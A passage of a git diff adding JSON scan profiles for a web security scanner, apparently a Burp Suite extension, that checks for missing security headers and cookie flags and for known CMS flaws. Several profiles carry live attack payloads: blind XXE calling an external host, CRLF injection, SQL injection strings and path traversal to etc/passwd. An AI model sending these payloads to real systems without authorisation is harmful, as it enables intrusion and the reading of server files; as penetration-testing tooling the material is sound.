\u003cpayload\u003e","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"InsertionPointType":[18,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127],"pathDiscovery":false}]
\ No newline at end of file
diff --git a/profiles/BlindXXE.bb b/profiles/BlindXXE.bb
new file mode 100755
index 0000000..134b2de
--- /dev/null
+++ b/profiles/BlindXXE.bb
@@ -0,0 +1 @@
+[{"Name":"BlindXXE","Active":true,"Scanner":1,"Author":"@egarme","Payloads":["\u003c?xml version\u003d\"1.0\" encoding\u003d\"ISO-8859-1\"?\u003e\u003c!DOCTYPE foo [\u003c!ELEMENT foo ANY\u003e\u003c!ENTITY xxe SYSTEM \"http://{BC}\"\u003e]\u003e\u003cfoo\u003e\u0026xee;\u003c/foo\u003e"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":[],"Tags":["XXE"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":0,"RedirType":0,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"BlindXXE","IssueSeverity":"High","IssueConfidence":"Certain","IssueDetail":"BLIND XXE found","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"InsertionPointType":[18,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127],"pathDiscovery":false}]
\ No newline at end of file
diff --git a/profiles/CMSDetection.bb b/profiles/CMSDetection.bb
new file mode 100755
index 0000000..11d3372
--- /dev/null
+++ b/profiles/CMSDetection.bb
@@ -0,0 +1 @@
+[{"Name":"CMSDetection","Active":true,"Scanner":2,"Author":"@egarme","Payloads":[],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["Wordpress","Drupal","Joomla","Magento","concre5","SharePoint","django","XOOPS","BigCommerce","Weebly","Ecwid","3dcart","WooCommerce"],"Tags":["CMS"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"CMSDetection","IssueSeverity":"Information","IssueConfidence":"Firm","IssueDetail":"CMS Found: \u003cbr\u003e\u003cgrep\u003e","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"pathDiscovery":false}]
\ No newline at end of file
diff --git a/profiles/CRLF-Attack.bb b/profiles/CRLF-Attack.bb
new file mode 100755
index 0000000..bd111cd
--- /dev/null
+++ b/profiles/CRLF-Attack.bb
@@ -0,0 +1 @@
+[{"Name":"CRLF-Attack","Active":true,"Scanner":1,"Author":"@egarme","Payloads":["%0D%0ASet-Cookie:mycookie\u003dmyvalue"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["mycookie\u003dmyvalue"],"Tags":[],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":true,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":1,"RedirType":3,"MaxRedir":3,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"CRLF-Attack","IssueSeverity":"Medium","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"InsertionPointType":[18,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127],"pathDiscovery":false}]
\ No newline at end of file
diff --git a/profiles/Cache-Control.bb b/profiles/Cache-Control.bb
new file mode 100755
index 0000000..a654054
--- /dev/null
+++ b/profiles/Cache-Control.bb
@@ -0,0 +1 @@
+[{"Name":"Cache-Control","Active":true,"Scanner":2,"Author":"@egarme","Payloads":[],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["Cache-Control: no-store"],"Tags":["SecurityHeaders"],"PayloadResponse":false,"NotResponse":true,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":true,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"Cache-Control","IssueSeverity":"Information","IssueConfidence":"Firm","IssueDetail":"Security Header \"Cache-Control\" not present in response.","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","pathDiscovery":false}]
\ No newline at end of file
diff --git a/profiles/Content-Security-Policy.bb b/profiles/Content-Security-Policy.bb
new file mode 100755
index 0000000..c66fb84
--- /dev/null
+++ b/profiles/Content-Security-Policy.bb
@@ -0,0 +1 @@
+[{"Name":"Content-Security-Policy","Active":true,"Scanner":2,"Author":"@egarme","Payloads":[],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["Content-Security-Policy"],"Tags":["SecurityHeaders"],"PayloadResponse":false,"NotResponse":true,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"Content-Security-Policy","IssueSeverity":"Information","IssueConfidence":"Firm","IssueDetail":"Security Header \"Content-Security-Policy\" not present in response.","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","pathDiscovery":false}]
\ No newline at end of file
diff --git a/profiles/CookieAttrubute-HttpOnly.bb b/profiles/CookieAttrubute-HttpOnly.bb
new file mode 100755
index 0000000..a653532
--- /dev/null
+++ b/profiles/CookieAttrubute-HttpOnly.bb
@@ -0,0 +1 @@
+[{"Name":"CookieAttrubute-HttpOnly","Active":true,"Scanner":2,"Author":"@egarme","Payloads":[],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["set-cookie:\\s*(?!.*(httponly)).*"],"Tags":["CookieAttributes","regex"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"CookieAttrubute-HttpOnly","IssueSeverity":"Low","IssueConfidence":"Firm","IssueDetail":"Cookie attribute \"HttpOnly\" not present: \u003cbr\u003e \u003cgrep\u003e","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"pathDiscovery":false}]
\ No newline at end of file
diff --git a/profiles/CookieAttrubute-SameSite.bb b/profiles/CookieAttrubute-SameSite.bb
new file mode 100755
index 0000000..4034dbb
--- /dev/null
+++ b/profiles/CookieAttrubute-SameSite.bb
@@ -0,0 +1 @@
+[{"Name":"CookieAttrubute-SameSite","Active":true,"Scanner":2,"Author":"@egarme","Payloads":[],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["set-cookie:\\s*(?!.*(samesite)).*"],"Tags":["CookieAttributes","regex"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"CookieAttrubute-SameSite","IssueSeverity":"Information","IssueConfidence":"Firm","IssueDetail":"Cookie attribute \"Samesite\" not present: \u003cbr\u003e \u003cgrep\u003e","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"pathDiscovery":false}]
\ No newline at end of file
diff --git a/profiles/CookieAttrubute-Secure.bb b/profiles/CookieAttrubute-Secure.bb
new file mode 100755
index 0000000..5197d9b
--- /dev/null
+++ b/profiles/CookieAttrubute-Secure.bb
@@ -0,0 +1 @@
+[{"Name":"CookieAttrubute-Secure","Active":true,"Scanner":2,"Author":"@egarme","Payloads":[],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["set-cookie:\\s*(?!.*(secure)).*"],"Tags":["CookieAttributes","regex"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"CookieAttrubute-Secure","IssueSeverity":"Low","IssueConfidence":"Firm","IssueDetail":"Cookie attribute \"secure\" not present: \u003cbr\u003e\u003cgrep\u003e\n\n","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"pathDiscovery":false}]
\ No newline at end of file
diff --git a/profiles/DefaultRDP.bb b/profiles/DefaultRDP.bb
new file mode 100755
index 0000000..d292174
--- /dev/null
+++ b/profiles/DefaultRDP.bb
@@ -0,0 +1 @@
+[{"Name":"DefaultRDP","Active":true,"Scanner":2,"Author":"@egarme","Payloads":[],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["default.rdp"],"Tags":["InformationDisclosure"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"DefaultRDP","IssueSeverity":"Information","IssueConfidence":"Firm","IssueDetail":"Default RDP Found:\u003cbr\u003e\n\nhttps://www.exploit-db.com/ghdb/5023/","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"pathDiscovery":false}]
\ No newline at end of file
diff --git a/profiles/DirectoryListing.bb b/profiles/DirectoryListing.bb
new file mode 100755
index 0000000..849ce8b
--- /dev/null
+++ b/profiles/DirectoryListing.bb
@@ -0,0 +1 @@
+[{"Name":"DirectoryListing","Active":true,"Scanner":2,"Author":"@egarme","Payloads":[],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["Index of /"],"Tags":[],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"DirectoryListing","IssueSeverity":"Information","IssueConfidence":"Firm","IssueDetail":"Directory Listing found","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","pathDiscovery":false}]
\ No newline at end of file
diff --git a/profiles/Drupalgeddon.bb b/profiles/Drupalgeddon.bb
new file mode 100755
index 0000000..d114ffb
--- /dev/null
+++ b/profiles/Drupalgeddon.bb
@@ -0,0 +1 @@
+[{"Name":"Drupalgeddon","Active":true,"Scanner":2,"Author":"@egarme","Payloads":[],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["\\/user\\/register.*Powered by Drupal"],"Tags":["RCE","CMS","regex"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"Drupalgeddon","IssueSeverity":"High","IssueConfidence":"Firm","IssueDetail":"Possible Drupalgeddon 2 or 3:\u003cbr\u003e\n\n\u003cbr\u003ehttps://www.exploit-db.com/ghdb/4782/\n\n\u003cbr\u003ehttps://www.exploit-db.com/exploits/44482/\n\n\u003cbr\u003ehttps://www.exploit-db.com/exploits/44557/\n","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"pathDiscovery":false}]
\ No newline at end of file
diff --git a/profiles/EmailInput.bb b/profiles/EmailInput.bb
new file mode 100755
index 0000000..ed406e6
--- /dev/null
+++ b/profiles/EmailInput.bb
@@ -0,0 +1 @@
+[{"Name":"EmailInput","Active":true,"Scanner":3,"Author":"@egarme","Payloads":[],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["type\u003demail"],"Tags":[],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"EmailInput","IssueSeverity":"Information","IssueConfidence":"Firm","IssueDetail":"Email Input Found","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","pathDiscovery":false}]
\ No newline at end of file
diff --git a/profiles/EndpointsExtractor.bb b/profiles/EndpointsExtractor.bb
new file mode 100755
index 0000000..2488ddc
--- /dev/null
+++ b/profiles/EndpointsExtractor.bb
@@ -0,0 +1 @@
+[{"Name":"EndpointsExtractor","Active":true,"Scanner":2,"Author":"@GochaOqradze","Payloads":[],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["(?:\"|\u0027)(((?:[a-zA-Z]{1,10}://|//)[^\"\u0027/]{1,}\\.[a-zA-Z]{2,}[^\"\u0027]{0,})|((?:/|\\.\\./|\\./)[^\"\u0027\u003e\u003c,;| *()(%%$^/\\\\\\[\\]][^\"\u0027\u003e\u003c,;|()]{1,})|([a-zA-Z0-9_\\-/]{1,}/[a-zA-Z0-9_\\-/]{1,}\\.(?:[a-zA-Z]{1,4}|action)(?:[\\?|/][^\"|\u0027]{0,}|))|([a-zA-Z0-9_\\-]{1,}\\.(?:php|asp|aspx|jsp|json|action|html|js|txt|xml)(?:\\?[^\"|\u0027]{0,}|)))(?:\"|\u0027)"],"Tags":["endpoints","regex"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":true,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"EndpointsExtractor","IssueSeverity":"Information","IssueConfidence":"Firm","IssueDetail":"Regex by Gerben_Javado : \n\u003cbr\u003ehttps://github.com/GerbenJavado/LinkFinder/blob/master/linkfinder.py\n\n\u003cbr\u003e\u003cbr\u003eEndpoints: \u003cbr\u003e\u003cgrep\u003e","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"pathDiscovery":false}]
\ No newline at end of file
diff --git a/profiles/ErrorPages-JobApps.bb b/profiles/ErrorPages-JobApps.bb
new file mode 100755
index 0000000..f8a1d08
--- /dev/null
+++ b/profiles/ErrorPages-JobApps.bb
@@ -0,0 +1 @@
+[{"Name":"ErrorPages-JobApps","Active":true,"Scanner":3,"Author":"@egarme","Payloads":[],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["syd_apply.cfm"],"Tags":["Errors"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"ErrorPages-JobApps","IssueSeverity":"Information","IssueConfidence":"Firm","IssueDetail":"Find error pages for job applications, sometimes can contain juicy information:\u003cbr\u003e\n\nhttps://www.exploit-db.com/ghdb/5033/","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"pathDiscovery":false}]
\ No newline at end of file
diff --git a/profiles/ErrorSQLi.bb b/profiles/ErrorSQLi.bb
new file mode 100755
index 0000000..0ca6dff
--- /dev/null
+++ b/profiles/ErrorSQLi.bb
@@ -0,0 +1 @@
+[{"Name":"ErrorSQLi","Active":true,"Scanner":1,"Author":"@egarme","Payloads":["\u0027-\u0027","\u0027 \u0027","\u0027\u0026\u0027","\u0027^\u0027","\u0027*\u0027","\u0027 or \u0027\u0027-\u0027","\u0027 or \u0027\u0027 \u0027","\u0027 or \u0027\u0027\u0026\u0027","\u0027 or \u0027\u0027^\u0027","\u0027 or \u0027\u0027*\u0027","\"-\"","\" \"","\"\u0026\"","\"^\"","\"*\"","\" or \"\"-\"","\" or \"\" \"","\" or \"\"\u0026\"","\" or \"\"^\"","\" or \"\"*\"","or true--","\" or true--","\u0027 or true--","\") or true--","\u0027) or true--","\u0027 or \u0027x\u0027\u003d\u0027x","\u0027) or (\u0027x\u0027)\u003d(\u0027x","\u0027)) or ((\u0027x\u0027))\u003d((\u0027x","\" or \"x\"\u003d\"x","\") or (\"x\")\u003d(\"x","\")) or ((\"x\"))\u003d((\"x","or 1\u003d1","or 1\u003d1-- ","or 1\u003d1#","or 1\u003d1/*"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["Microsoft OLE DB Provider for ODBC Drivers error","You have an error in your SQL syntax","ORA-00933: SQL command not properly ended","Microsoft SQL Native Client error","Query failed: ERROR: syntax error at or near","You have an error in your SQL syntax","MySQL Error: 1064\" \u0026 \"Session halted","mysql error with query","sQL syntax error","PostgreSQL query failed: ERROR: parser: parse error","Warning: mysql_fetch_array","Warning: mysql_num_rows","Warning: mysql_query","Warning: mysql_fetch_assoc","Warning: mysql_result","Warning: mysql_free_result"],"Tags":["SQLi"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":1,"RedirType":4,"MaxRedir":5,"payloadPosition":2,"payloadsFile":"","grepsFile":"","IssueName":"ErrorSQLi","IssueSeverity":"High","IssueConfidence":"Certain","IssueDetail":"Error SQLi with payloads: \u003cbr\u003e \u003cpayload\u003e","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"InsertionPointType":[18,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127],"pathDiscovery":false}]
\ No newline at end of file
diff --git a/profiles/GitFinder.bb b/profiles/GitFinder.bb
new file mode 100755
index 0000000..55a75f0
--- /dev/null
+++ b/profiles/GitFinder.bb
@@ -0,0 +1 @@
+[{"Name":"GitFinder","Active":true,"Scanner":1,"Author":"@egarme","Payloads":["/.git/HEAD"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["refs"],"Tags":[],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":1,"RedirType":4,"MaxRedir":5,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"GitFinder","IssueSeverity":"Low","IssueConfidence":"Firm","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"InsertionPointType":[65],"pathDiscovery":false}]
\ No newline at end of file
diff --git a/profiles/Joomla-ArbitraryFileUpload.bb b/profiles/Joomla-ArbitraryFileUpload.bb
new file mode 100755
index 0000000..41f980d
--- /dev/null
+++ b/profiles/Joomla-ArbitraryFileUpload.bb
@@ -0,0 +1 @@
+[{"Name":"Joomla-ArbitraryFileUpload","Active":true,"Scanner":3,"Author":"@egarme","Payloads":[],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["index.php?option\u003dcom_joomanager"],"Tags":["CMS"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"Joomla-ArbitraryFileUpload","IssueSeverity":"High","IssueConfidence":"Firm","IssueDetail":"Joomla Arbitrary File Upload:\u003cbr\u003e\n\nhttps://www.exploit-db.com/ghdb/4687/","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"pathDiscovery":false}]
\ No newline at end of file
diff --git a/profiles/Joomla-CVE-2015-7297.bb b/profiles/Joomla-CVE-2015-7297.bb
new file mode 100755
index 0000000..fbc20c3
--- /dev/null
+++ b/profiles/Joomla-CVE-2015-7297.bb
@@ -0,0 +1 @@
+[{"Name":"Joomla-CVE-2015-7297","Active":true,"Scanner":2,"Author":"@egarme","Payloads":[],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["powered by joomla 3.2","powered by joomla 3.3","powered by joomla 3.4"],"Tags":["CVE","CMS"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"Joomla-SQLi","IssueSeverity":"High","IssueConfidence":"Firm","IssueDetail":"Joomla SQLi - CVE-2015-7297: \u003cbr\u003e\n\nhttps://www.exploit-db.com/ghdb/4110/","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"pathDiscovery":false}]
\ No newline at end of file
diff --git a/profiles/Joomla-ReflectedXSS.bb b/profiles/Joomla-ReflectedXSS.bb
new file mode 100755
index 0000000..3b3f81a
--- /dev/null
+++ b/profiles/Joomla-ReflectedXSS.bb
@@ -0,0 +1 @@
+[{"Name":"Joomla-ReflectedXSS","Active":true,"Scanner":3,"Author":"@egarme","Payloads":[],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["sendmessage.php?type\u003dskype"],"Tags":["XSS","CMS"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"Joomla-ReflectedXSS","IssueSeverity":"Medium","IssueConfidence":"Certain","IssueDetail":"Joomla-ReflectedXSS:\u003cbr\u003e\n\nhttps://www.exploit-db.com/ghdb/4398/","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"pathDiscovery":false}]
\ No newline at end of file
diff --git a/profiles/JoomlaSQLi-com_artforms .bb b/profiles/JoomlaSQLi-com_artforms .bb
new file mode 100755
index 0000000..3a1d27c
--- /dev/null
+++ b/profiles/JoomlaSQLi-com_artforms .bb
@@ -0,0 +1 @@
+[{"Name":"JoomlaSQLi-com_artforms ","Active":true,"Scanner":3,"Author":"@egarme","Payloads":[],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["index.php?option\u003dcom_artforms"],"Tags":[],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"JoomlaSQLi","IssueSeverity":"High","IssueConfidence":"Firm","IssueDetail":"Joomla \"com_artforms\" component SQL Injection:\u003cbr\u003e\n\nhttps://www.exploit-db.com/ghdb/4386/","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"pathDiscovery":false}]
\ No newline at end of file
diff --git a/profiles/Linux-PathTraversal-MR.bb b/profiles/Linux-PathTraversal-MR.bb
new file mode 100755
index 0000000..cb62c5d
--- /dev/null
+++ b/profiles/Linux-PathTraversal-MR.bb
@@ -0,0 +1 @@
+[{"Name":"Linux-PathTraversal-MR","Active":true,"Scanner":1,"Author":"@egarme","Payloads":["/../{FILE}","/../../{FILE}","/../../../{FILE}","/../../../../{FILE}","/../../../../../{FILE}","/../../../../../../{FILE}","/../../../../../../../{FILE}","/../../../../../../../../{FILE}","/..%2f{FILE}","/..%2f..%2f{FILE}","/..%2f..%2f..%2f{FILE}","/..%2f..%2f..%2f..%2f{FILE}","/..%2f..%2f..%2f..%2f..%2f{FILE}","/..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","/..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["root:x"],"Tags":[],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"Linux-PathTraversal","IssueSeverity":"Medium","IssueConfidence":"Certain","IssueDetail":"Path traversal with payloads: \u003cbr\u003e \u003cpayload\u003e","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[{"type":"Payload","match":"{FILE}","replace":"etc/passwd","regex":"String","comment":"Generic comment"}],"VariationAttributes":[],"InsertionPointType":[18,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127],"pathDiscovery":false}]
\ No newline at end of file
diff --git a/profiles/OAuth2.bb b/profiles/OAuth2.bb
new file mode 100755
index 0000000..8e56f27
--- /dev/null
+++ b/profiles/OAuth2.bb
@@ -0,0 +1 @@
+[{"Name":"OAuth2","Active":true,"Scanner":3,"Author":"@egarme","Payloads":[],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["response_type","client_id","grant_type","redirect_uri","oauth","oidc"],"Tags":["JWT"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"OAuth2","IssueSeverity":"Information","IssueConfidence":"Firm","IssueDetail":"OAuth2 Found","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","pathDiscovery":false}]
\ No newline at end of file
diff --git a/profiles/OAuth2response.bb b/profiles/OAuth2response.bb
new file mode 100755
index 0000000..68ea45e
--- /dev/null
+++ b/profiles/OAuth2response.bb
@@ -0,0 +1 @@
